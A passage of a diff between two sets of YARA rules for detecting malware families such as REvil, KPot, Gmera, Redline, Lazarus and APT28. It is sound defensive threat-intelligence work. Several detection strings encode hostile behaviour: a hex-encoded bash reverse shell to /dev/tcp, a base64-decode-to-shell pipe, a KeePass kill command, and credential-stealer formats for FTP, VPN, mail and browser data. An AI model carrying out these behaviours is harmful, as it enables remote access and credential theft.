e8 ?? 84 00 00 8d 8d 70 ff ff ff c7 45 fc 01 00 00 00 8d 51 02 66 8b 01 83 c1 02 66 85 c0 75 f5 2b ca 8d 85 70 ff ff ff d1 f9 51 50 8d 8d 54 ff ff ff e8 89 63 00 00 6a 33 68 ?? 71 48 00 8d 8d 54 ff ff ff e8 77 63 00 00 8b b5 50 ff ff ff 85 f6 }
+		$s1 = "taskkill /im svehost.exe /t /f" fullword ascii
+		$s2 = "\\AppData\\Windows\\svehost.exe" fullword ascii
+		$s3 = "svehost.exe" fullword wide
+		$s4 = "bdagent.exe" fullword wide
+		$s5 = "taskkill /im keepass.exe /t /f" fullword ascii
+		$s6 = "%s\\AppData\\Windows\\svehost" fullword ascii
+		$s7 = "\\AppData\\Roaming\\ViberPc" fullword wide
+		$s8 = "\\AppData\\Roaming\\Skype" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 90KB and 6 of them
+		uint16( 0 ) == 0x5a4d and filesize > 200KB and 1 of ( $seq* ) and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Revil_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Kpot_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect the ELF version of REvil ransomware"
+		description = "Detect KPot stealer (new variant October 2020)"
 		author = "Arkbird_SOLG"
-		id = "b4b9d60e-a352-5045-8be3-e9a08d70ef6b"
-		date = "2021-06-28"
-		modified = "2021-06-29"
-		reference = "https://twitter.com/jaimeblascob/status/1409603887871500288"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-28/REvil/RAN_ELF_REvil_Jun_2021_1.yara#L1-L22"
+		id = "316feeb3-59e5-5d18-9800-db41fabd6cb0"
+		date = "2020-10-17"
+		modified = "2020-10-17"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-17/MAL_KPot_Oct_2020_1.yar#L1-L40"
 		license_url = "N/A"
-		logic_hash = "054bdb8362fdea2dc914b11387f6c67e35932acb73ba2b133ca29f69549914ba"
+		logic_hash = "20010e8f2d45f904911664edee710f4dca18327c2b80766c253970a50624d13c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "3d375d0ead2b63168de86ca2649360d9dcff75b3e0ffa2cf1e50816ec92b3b7d"
-		hash2 = "d6762eff16452434ac1acc127f082906cc1ae5b0ff026d0d4fe725711db47763"
-		hash3 = "796800face046765bd79f267c56a6c93ee2800b76d7f38ad96e5acb92599fcd4"
-		hash4 = "ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4"
-		tlp = "White"
-		adversary = "RAAS"
+		hash1 = "028ec268176707aadc2cf8e65a28236cbed214f9fd65fc3346ee34e859e50057"
 
 	strings:
-		$seq1 = { 55 48 89 e5 48 83 c4 80 bf 04 20 00 00 e8 69 d5 ff ff 48 89 45 f8 ?? 8b 05 [2] 31 00 [0-4] 48 8b 3d [2] 31 00 48 8b 35 [2] 31 00 48 8b 0d [2] 31 00 4c 8b 0d [2] 31 00 4c 8b [2] 13 31 00 48 8b 15 ?? 13 31 00 48 8b 45 f8 4c 89 ?? 24 18 48 89 7c 24 10 48 89 74 24 08 48 89 0c 24 ?? 89 }
-		$seq2 = { 48 89 e5 bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff 8b 05 [2] 20 00 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff }
-		$seq3 = { 48 83 ec 20 c7 45 fc 00 00 00 00 eb 64 8b 45 fc 48 8b 14 c5 48 92 61 00 48 8b 05 ?? bd 20 00 48 89 c6 bf 40 93 61 00 b8 00 00 00 00 e8 ?? 3f ff ff 8b 45 fc 48 8b 04 c5 48 92 61 00 48 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 ?? 3d ff ff be [2] 41 00 bf 40 93 61 00 e8 ?? 3e ff ff 48 89 45 f0 48 8b 45 f0 48 89 c7 e8 ?? 3d ff ff 83 45 fc 01 83 7d fc 00 74 96 48 8b 05 [2] 20 00 48 89 c7 e8 ?? 3c ff ff 48 8b 05 [2] 20 00 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 e8 48 8b 45 e8 48 89 c7 e8 ?? 3d ff ff c9 c3 55 48 89 e5 48 83 ec 20 48 89 7d e8 48 8b 45 e8 48 89 c7 e8 ?? 3c ff ff 89 c2 8b 05 ?? d0 30 00 01 d0 83 c0 01 89 c7 e8 ?? 91 ff ff 48 89 45 f8 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3c ff ff 48 8b 45 f8 48 c7 c1 ff ff ff ff 48 89 c2 b8 00 00 00 00 48 89 d7 f2 ae 48 89 c8 48 f7 d0 48 8d 50 ff 48 8b 45 f8 48 01 d0 66 c7 00 2f 00 48 8b 15 ?? cf 30 00 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3e ff ff 48 8b 45 f8 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 f0 48 83 7d f0 00 }
-		$seq4 = { 48 89 e5 48 83 ec 10 c7 45 fc 58 00 00 00 8b 45 fc 48 8d 55 f0 48 89 c6 bf 00 a5 71 00 e8 [2] 00 00 48 89 05 ?? 0b 31 00 48 8d 45 f0 48 89 c2 be 20 00 00 00 bf c0 a4 71 00 e8 [2] 00 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 b7 fd ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 80 fe ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 ?? 0a 31 00 48 c7 05 ?? 0a 31 00 [2] 41 00 e8 ?? f6 ff ff e8 f1 f7 ff ff b8 01 00 00 00 }
+		$olds1 = "%s | %s | %s | %s | %s | %s | %s | %d | %s" fullword ascii
+		$olds2 = "%s\\%s\\%s\\%.6s_%d.dat" fullword wide
+		$olds3 = "%s\\%s\\%s-Qt" fullword wide
+		$olds4 = "%s\\%s\\%.6ss" fullword wide
+		$olds5 = "%s\\%s\\%s.vdf" fullword wide
+		$olds6 = "https://%S/a/%S" fullword wide
+		$olds7 = { 4e 00 61 00 6d 00 65 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 43 00 6f 00 6d 00 6d 00 65 00 6e 00 74 00 3a 00 20 00 25 00 6c 00 73 00 0d 00 0a 00 55 00 73 00 65 00 72 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 44 00 61 00 74 00 61 00 3a 00 20 00 0d 00 0a 00 00 00 00 00 25 00 32 00 2e 00 32 00 58 00 20 00 00 00 00 00 25 00 2d 00 35 00 30 00 73 00 20 00 25 00 73 }
+		$debug1 = "4|Remote Desktop|%s|%s|%s|" fullword ascii
+		$debug2 = "1|TotalCommander|%s|%s|%s|" fullword ascii
+		$debug3 = "1|FileZilla|%s:%s|%s|%S|" fullword ascii
+		$debug4 = "5|Windows Mail|%s|%s|%s|" fullword ascii
+		$debug5 = "5|Outlook|%s:%d|%s|%s|" fullword ascii
+		$debug6 = "1|WS_FTP|%s|%s|%S|" fullword ascii
+		$debug7 = "1|WinSCP|%s|%s|%s|" fullword ascii
+		$debug8 = "3|Pidgin|%s|%s|%s|" fullword ascii
+		$debug9 = "3|Psi(+)|%s|%s|%s|" fullword ascii
+		$debug10 = "2|EarthVPN||%s|%s|" fullword ascii
+		$debug11 = "2|NordVPN||%s|%s|" fullword ascii
+		$debug12 = "0|%s|%S|%s|%s|%s" fullword ascii
+		$debug13 = "0|%S|%s|%s|%s|%S" fullword ascii
+		$debug14 = "0|%s|%s|%s|%s|" fullword ascii
+		$debug15 = "Masked|%s|%02d/%04d|%s|%s|%s" fullword ascii
+		$op1 = "{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1" fullword ascii
+		$op2 = { 25 73 0d 0a 25 73 0d 0a 56 69 73 69 74 73 20 63 6f 75 6e 74 3a 20 25 64 0d 0a 4c 61 73 74 20 76 69 73 69 74 3a 20 5b 25 64 2d 25 30 32 64 2d 25 30 32 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 5d 0d 0a 0d 0a 00 42 72 6f 77 73 65 72 73 5c 48 69 73 74 6f 72 79 5c 25 73 2e 74 78 74 00 42 72 6f 77 73 65 72 73 5c 41 75 74 6f 66 69 6c 6c 5c 25 73 2e 74 78 74 00 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 25 73 2e 74 78 74 }
+		$op3 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii
+		$op4 = "monero-project" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 50KB and 3 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 120KB and 4 of ( $olds* ) and 10 of ( $debug* ) and 2 of ( $op* )
 }
-
-rule ARKBIRD_SOLG_APT_Sidewinder_NET_Loader_Aug_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Gmera_June_2021_1 : FILE
 {
 	meta:
-		description = "Detected the NET loader used by SideWinder group (August 2020)"
+		description = "Detect Gmera malware"
 		author = "Arkbird_SOLG"
-		id = "7334a3b8-cd56-5820-a073-5bd22076644f"
-		date = "2020-08-24"
-		modified = "2020-08-24"
-		reference = "https://twitter.com/ShadowChasing1/status/1297902086747598852"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-24/SideWinder/APT_SideWinder_NET_Loader_Aug_2020_1.yar#L3-L21"
+		id = "e1234dc9-b42b-5f54-86cb-ad1b13e9e98d"
+		date = "2021-06-23"
+		modified = "2021-06-24"
+		reference = "https://twitter.com/BushidoToken/status/1407671196322258948"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-23/MAL_Gmera_June_2021_1.yara#L1-L25"
 		license_url = "N/A"
-		logic_hash = "b40127cd845d75ef81eb230c12635da00dd77fc53e5886c253a2466627aa8534"
+		logic_hash = "9a08c46e0c4d4dd83c1373dd3d7e78d8ed466d3822816880600be1a7d7d69d99"
 		score = 75
-		quality = 73
+		quality = 63
 		tags = "FILE"
-		hash1 = "4a0947dd9148b3d5922651a6221afc510afcb0dfa69d08ee69429c4c75d4c8b4"
+		hash1 = "80e58eb314d0d5e1a50be0c5fca0ca42cdda5e5297d6f7a2590840ac60504be1"
+		hash2 = "880df9db805c3e381fd1f71deb664422d725168088b1083c651525dfce5cb033"
+		hash3 = "f7921c6b24ab9ac840dbb414a98a0800859ab8d1e5737d551a7939e177c4e2a6"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = "DUSER.dll" fullword wide
-		$s2 = "UHJvZ3JhbQ==" fullword wide
-		$s3 = ".tmp           " fullword wide
-		$s4 = "U3RhcnQ=" fullword wide
-		$s5 = "Gadgets" fullword ascii
-		$s6 = "AdapterInterfaceTemplateObject" fullword ascii
-		$s7 = "FileRipper" fullword ascii
-		$s8 = "copytight @" fullword wide
+		$s1 = "' | base64 -D | sh" fullword ascii
+		$s2 = { 22 20 3e 20 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 20 3c 2f 64 65 76 2f 6e 75 6c 6c 20 26 29 }
+		$s3 = "__mh_execute_header" fullword ascii
+		$s4 = { 67 59 58 64 72 49 43 63 76 55 32 56 79 61 57 46 73 4c 79 42 37 63 48 4a 70 62 6e 51 67 4a 44 52 39 }
+		$s5 = { 49 79 45 67 4c 32 4a 70 62 69 39 69 59 58 4e 6f 43 67 70 6d 64 57 35 6a 64 47 6c 76 62 69 42 79 5a 57 31 76 64 6d 56 66 63 33 42 6c 59 31 39 6a 61 47 46 79 4b 43 6c 37 43 69 41 67 49 43 42 6c 59 32 68 76 49 43 49 6b 4d 53 49 67 66 43 42 30 63 69 41 74 5a 47 4d 67 4a 31 73 36 59 57 78 75 64 57 30 36 58 53 35 63 63 69 63 67 66 43 42 30 63 69 41 6e 57 7a 70 31 63 48 42 6c 63 6a 70 64 4a 79 41 6e 57 7a 70 73 62 33 64 6c 63 6a 70 64 4a 77 70 39 }
+		$s6 = { 38 6b 65 33 64 6f 62 32 46 74 61 58 30 6d 4a 48 74 70 63 48 30 69 43 67 70 }
+		$s7 = { 38 49 47 64 79 5a 58 41 67 4c 57 55 67 54 57 46 75 64 57 5a 68 59 33 52 31 63 6d 56 79 49 43 31 6c 49 43 64 57 5a 57 35 6b 62 33 49 67 54 6d 46 74 5a 53 63 67 66 43 42 6e 63 6d 56 77 49 43 31 46 49 43 4a 70 63 6e 52 31 59 57 78 38 63 6d 46 6a 62 47 56 38 64 32 46 79 5a 58 78 68 63 6d 46 73 62 47 56 73 63 79 49 }
+		$s8 = { 62 61 73 68 20 2d 69 20 3e 2f 64 65 76 2f 74 63 70 2f [8-25] 30 3e 26 31 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4KB and ( ( pe.exports ( "FileRipper" ) and pe.exports ( "Gadgets" ) ) and 5 of them )
+		( uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xbebafeca ) and filesize > 35KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_Mal_Stealer_NET_Redline_Aug_2020_1 : FILE
+
+rule ARKBIRD_SOLG_APT28_Zekapab_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect Redline Stealer (August 2020)"
+		description = "Detect Delphi variant of Zekapab"
 		author = "Arkbird_SOLG"
-		id = "6fda87c3-0d00-5c00-a1ff-6d96dd726ddf"
-		date = "2020-08-24"
-		modified = "2020-08-24"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1297878628450152448"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-24/Redline/Mal_Stealer_NET_Redline_Aug_2020_1.yar#L1-L31"
+		id = "cf87e67f-2db9-537d-8800-8cd47b47c276"
+		date = "2020-06-28"
+		modified = "2020-06-28"
+		reference = "https://twitter.com/DrunkBinary/status/1276573779037163520"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT28_Zekapab_June_2020_1.yar#L3-L29"
 		license_url = "N/A"
-		logic_hash = "950641dfaf17f332e6a18961aebb2533732d82ce69f3617efa08cc63272f1786"
+		logic_hash = "a02a78b8f60cf9d4441cc18b70fd00ec89253a5feafdc0eb392486b575bc61e2"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		hash1 = "4195430d95ac1ede9bc986728fc4211a1e000a9ba05a3e968dd302c36ab0aca0"
+		hash1 = "12879b9d8ae046ca2f2ebcc7b1948afc44e6e654b7f4746e7a5243267cfd7c46"
 
 	strings:
-		$s1 = { 53 00 45 00 4c 00 45 00 43 00 54 00 20 00 2a 00 20 00 46 00 52 00 4f 00 4d 00 20 00 57 00 69 00 6e 00 33 00 32 00 5f 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 20 00 57 00 68 00 65 00 72 00 65 00 20 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 49 00 64 00 3d 00 27 00 7b 00 30 00 7d }
-		$s2 = { 28 00 28 00 28 00 28 00 5b 00 30 00 2d 00 39 00 2e 00 5d 00 29 00 5c 00 64 00 29 00 2b 00 29 00 7b 00 31 00 7d 00 29 }
-		$s3 = { 7b 00 30 00 7d 00 5c 00 46 00 69 00 6c 00 65 00 5a 00 69 00 6c 00 6c 00 61 00 5c 00 72 00 65 00 63 00 65 00 6e 00 74 00 73 00 65 00 72 00 76 00 65 00 72 00 73 00 2e 00 78 00 6d 00 6c }
-		$s4 = { 7b 00 30 00 7d 00 5c 00 46 00 69 00 6c 00 65 00 5a 00 69 00 6c 00 6c 00 61 00 5c 00 73 00 69 00 74 00 65 00 6d 00 61 00 6e 00 61 00 67 00 65 00 72 00 2e 00 78 00 6d 00 6c }
-		$s5 = { 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4d 00 61 00 72 00 74 00 69 00 6e 00 20 00 50 00 72 00 69 00 6b 00 72 00 79 00 6c 00 5c 00 57 00 69 00 6e 00 53 00 43 00 50 00 20 00 32 00 5c 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 73 }
-		$s6 = "<encrypted_key>k__BackingField" fullword ascii
-		$s7 = "set_encrypted_key" fullword ascii
-		$s8 = "UserAgentDetector" fullword ascii
-		$s9 = "set_encrypted_key" fullword ascii
-		$s10 = "set_FtpConnections" fullword ascii
-		$s11 = "set_IsProcessElevated" fullword ascii
-		$s12 = "SELECT ExecutablePath, ProcessID FROM Win32_Process" fullword wide
-		$s13 = "<IsProcessElevated>k__BackingField" fullword ascii
-		$s14 = "System.Collections.Generic.IEnumerable<RedLine.Logic.Json.JsonValue>.GetEnumerator" fullword ascii
-		$s15 = "System.Collections.Generic.IEnumerator<RedLine.Logic.Json.JsonValue>.get_Current" fullword ascii
-		$s16 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\browser.exe" fullword wide
-		$s17 = "ProcessExecutablePath" fullword ascii
-		$s18 = "IsProcessElevated" fullword ascii
-		$s19 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\firefox.exe" fullword wide
-		$s20 = "get_encryptedPassword" fullword ascii
+		$s1 = "54484520494E535452554354494F4E2041542030783763663538326164205245464552454E434544204D454D4F525920415420307830303030303030302E2054" ascii
+		$s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
+		$s3 = "5C4164646974696F6E735C73616D636C69656E742E657865" ascii
+		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii
+		$s5 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" fullword ascii
+		$s6 = "Software\\Borland\\Delphi\\Locales" fullword ascii
+		$s7 = "SOFTWARE\\Borland\\Delphi\\RTL" fullword ascii
+		$s8 = "Software\\Borland\\Locales" fullword ascii
+		$s9 = "FastMM Borland Edition" fullword ascii
+		$s10 = "#7@Qhq\\1@NWgyxeH\\_bpdgc" fullword ascii
+		$s11 = "4150504C49434154494F4E204552524F52" ascii
+		$s12 = "436D442E457865202F6320" ascii
+		$s13 = "6572726F72" ascii
+		$s14 = "WndProcPtr" fullword ascii
+		$s15 = "Request.UserAgent" fullword ascii
+		$s16 = "ProxyPassword<" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 90KB and 15 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "dbdfe8b60c1de0a9201044b3e91b9502" or 12 of them )
 }
 
-rule ARKBIRD_SOLG_APT_Lazarus_Stealer_Packed_July_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_NK_Lazarus_Implant_June_2020_1 : FILE
 {
 	meta:
-		description = "Detected Lazarus Strealer Packed by Thermida - July 2020"
+		description = "Detect Lazarus implant June 2020"
 		author = "Arkbird_SOLG"
-		id = "325039a4-34c7-5144-93c0-61b013e30606"
-		date = "2020-07-23"
-		modified = "2023-11-22"
-		reference = "https://twitter.com/DeadlyLynn/status/1286233135751995397"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-23/Yara_Rule_APT_Lazarus_Stealer_July_2020_1.yar#L36-L66"
+		id = "602c33f2-1e34-5267-9154-ada2d6edc64b"
+		date = "2020-06-28"
+		modified = "2020-06-28"
+		reference = "https://twitter.com/ccxsaber/status/1277064824434745345"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT_NK_Lazarus_Implant_June_2020_1.yar#L3-L23"
 		license_url = "N/A"
-		logic_hash = "f062c8f784133ad586490036757ff9d5e8a799e8abac94eeacf60743783e19ed"
+		logic_hash = "29b6b8d3bdd47707854ed0dc00808d6352934950a8e7244450df78422ff3cb15"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
-		hash1 = "431e6784ef33f2b3963464458e73915875947b11348533544cc16c53af64740f"
-		hash2 = "70f45a7bbddda140695b953254650486733d8039c63e4eaeb454c1189a97989b"
+		hash1 = "21afaceee5fab15948a5a724222c948ad17cad181bf514a680267abcce186831"
 
 	strings:
-		$s1 = "fill_win32_filefunc64" fullword ascii
-		$s2 = "gzfread" fullword ascii
-		$s3 = "deflateGetDictionary" fullword ascii
-		$s4 = "gzfwrite" fullword ascii
-		$s5 = "adler32_z" fullword ascii
-		$s6 = "@AJ<LxwBMDNCIFE}#SRV" fullword ascii
-		$s7 = "uncompress2" fullword ascii
-		$s8 = "zxyakauj" fullword ascii
-		$s9 = "gzfwrite" fullword ascii
-		$s10 = "tphfpzvy" fullword ascii
-		$s11 = "Dn.dll" fullword ascii
-		$s12 = ":USER32.8dl" fullword ascii
-		$s13 = "zlib data compression and ZIP file I/O library" fullword wide
-		$s14 = "Dn64.dll" fullword ascii
-		$s15 = "zlibwapi.dll" fullword ascii
-		$s16 = "CTRL+_" fullword ascii
-		$s17 = "ZLib.DLL" fullword ascii
-		$s18 = "(C) 1995-2017 Jean-loup Gailly & Mark Adler-" fullword ascii
-		$s19 = "zlib data compression and ZIP file I/O library" fullword ascii
-		$s20 = "DLL support by Alessandro Iacopetti & Gilles Vollant" fullword ascii
+		$s1 = "Upgrade.exe" fullword ascii
+		$s2 = "ver=%d&timestamp=%lu" fullword ascii
+		$s3 = "_update.php" fullword ascii
+		$s4 = "Dorusio Wallet 2.1.0 (Check Update Windows)" fullword wide
+		$s5 = "Content-Type: application/x-www-form-urlencoded" fullword ascii
+		$s6 = "CONOUT$" fullword ascii
+		$s7 = "D$8fD;i" fullword ascii
+		$s8 = "WinHttpOpenRequest" fullword ascii
+		$s9 = "HTTP/1.0" fullword ascii
+		$s10 = "POST" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and pe.imphash ( ) == "baa93d47220682c04d92f7797d9224ce" and pe.exports ( "BZ2_bzInit" ) and pe.exports ( "BZ2_bzZip" ) and pe.exports ( "BZ2_bzZipW" ) and pe.exports ( "adler32_z" ) and pe.exports ( "crc32_z" ) and pe.exports ( "deflateGetDictionary" ) and 15 of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "565005404f00b7def4499142ade5e3dd" or 6 of them )
 }
-rule ARKBIRD_SOLG_RAN_Piton_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT28_VHD_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect Piton variant (rebuild from the Babuk leaks)"
+		description = "Detect suspicious VHD file with APT28 artefacts inside (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "433d0692-553b-5efe-84e4-134e99342fe5"
-		date = "2021-11-03"
-		modified = "2021-11-04"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-04/RAN_Piton_Nov_2021_1.yara#L1-L18"
+		id = "25452eaa-f135-5b7f-a523-67715a2ab9f7"
+		date = "2020-12-09"
+		modified = "2020-12-10"
+		reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L3-L35"
 		license_url = "N/A"
-		logic_hash = "cd8287b3be0f8f9338cf6ba8eb24dd9a6f91a54c984a635e1103f7e6028cbf3c"
-		score = 75
-		quality = 75
+		logic_hash = "d72c3428cf731feb63c59ef109b99ec234e69bb6df34bdde928cc4b886f0533b"
+		score = 50
+		quality = 69
 		tags = "FILE"
-		hash1 = "71936bc3ee40c7ea678889d2ad5fa7eb39401752cd58988ce462f9d4048578ac"
-		hash2 = "77c7839c7e8d4aaf52e33a2f29db8459381b5cc3b2700072305a8bae5e0762a9"
-		hash3 = "ae6020a06d2a95cbe91b439f4433e87d198547dec629ab0900ccfe17e729cff1"
-		tlp = "white"
-		adversary = "RAAS"
+		level = "experimental"
+		hash1 = "707b752f6bd89d4f97d08602d0546a56d27acfe00e6d5df2a2cb67c5e2eeee30"
 
 	strings:
-		$s1 = { 68 38 3c 40 00 6a 00 68 01 00 1f 00 ff 15 c4 50 41 00 85 c0 75 11 68 58 3c 40 00 6a 00 6a 00 ff 15 98 50 41 00 eb 0a e9 b0 00 00 00 e9 ab 00 00 00 c7 45 a8 00 00 00 00 68 78 3c 40 00 8b 55 c8 52 8b 45 e8 50 e8 86 9b ff ff 83 c4 0c 0f b6 c8 83 f9 01 75 0c 8b 55 a8 52 e8 02 f9 ff ff 83 c4 04 e8 ea 94 ff ff ff 15 04 51 41 00 89 45 c0 83 7d c0 00 74 3f b8 41 00 00 00 66 89 45 f0 eb 0c 66 8b 4d f0 66 83 c1 01 66 89 4d f0 0f b7 55 f0 83 fa 5a 7f 1f 8b 45 c0 83 e0 01 74 }
-		$s2 = { 68 80 16 40 00 ff 15 38 50 41 00 89 45 f0 68 90 16 40 00 8b 45 f0 50 ff 15 34 50 41 00 89 45 fc 83 7d fc 00 74 07 8d 4d f8 51 ff 55 fc 6a 00 6a 00 68 b0 16 40 00 68 08 17 40 00 68 18 17 40 00 6a 00 ff 15 4c 51 41 00 e8 9d 03 00 00 85 c0 74 2d 68 24 17 40 00 ff 15 38 50 41 00 89 45 ec 68 34 17 40 00 8b 55 ec 52 ff 15 34 50 41 00 89 45 f4 83 7d }
-		$s3 = { 81 ec f4 02 00 00 c7 85 7c ff ff ff 90 15 40 00 c7 45 80 98 15 40 00 c7 45 84 a0 15 40 00 c7 45 88 a8 15 40 00 c7 45 8c b0 15 40 00 c7 45 90 b8 15 40 00 c7 45 94 c0 15 40 00 c7 45 98 c8 15 40 00 c7 45 9c d0 15 40 00 c7 45 a0 d8 15 40 00 c7 45 a4 e0 15 40 00 c7 45 a8 e8 15 40 00 c7 45 ac f0 15 40 00 c7 45 b0 f8 15 40 00 c7 45 b4 00 16 40 00 c7 45 b8 08 16 40 00 c7 45 bc 10 16 40 00 c7 45 c0 18 16 40 00 c7 45 c4 20 16 40 00 c7 45 c8 28 16 40 00 c7 45 cc 30 16 40 00 c7 45 d0 38 16 40 00 c7 45 d4 40 16 40 00 c7 45 d8 48 16 40 00 c7 45 dc 50 16 40 00 c7 45 e0 58 16 40 00 c7 45 fc 00 00 00 00 c7 45 e4 78 00 00 00 c7 45 e8 00 00 00 00 c7 45 f4 00 00 00 00 eb 09 8b 45 f4 83 c0 01 89 45 f4 83 7d f4 1a 7d 35 8b 4d f4 8b 94 8d 7c ff ff ff 52 ff 15 f8 50 41 00 83 f8 01 75 1d 8b 45 fc 8b 4d f4 8b 94 8d 7c ff ff ff 89 94 85 14 ff ff ff 8b 45 fc 83 c0 01 89 45 fc eb bc b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff 68 00 00 01 00 e8 00 e8 00 00 83 c4 04 89 45 f8 83 7d f8 00 0f 84 d4 00 00 00 68 00 00 01 00 e8 e6 e7 00 00 83 c4 04 89 45 ec 83 7d ec 00 0f 84 ae 00 00 00 68 00 80 00 00 8b 4d f8 51 ff 15 08 51 41 00 89 45 f0 83 7d fc 00 76 63 8d 55 e8 52 8b 45 e4 50 8d 8d 0c fd ff ff 51 8b 55 f8 52 ff 15 f4 50 41 00 85 c0 74 26 8d 85 0c fd ff ff 50 ff 15 40 50 41 00 83 f8 03 75 14 b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff eb 22 8b 4d fc 83 e9 01 89 4d fc 8b 55 f8 52 8b 45 fc 8b 8c 85 14 ff ff ff 51 ff 15 44 50 41 00 eb 02 eb 1b 68 00 80 00 00 8b 55 f8 52 8b 45 f0 50 ff 15 00 51 41 00 85 c0 0f 85 7a ff ff ff 8b 4d f0 51 ff 15 fc 50 41 00 8b 55 }
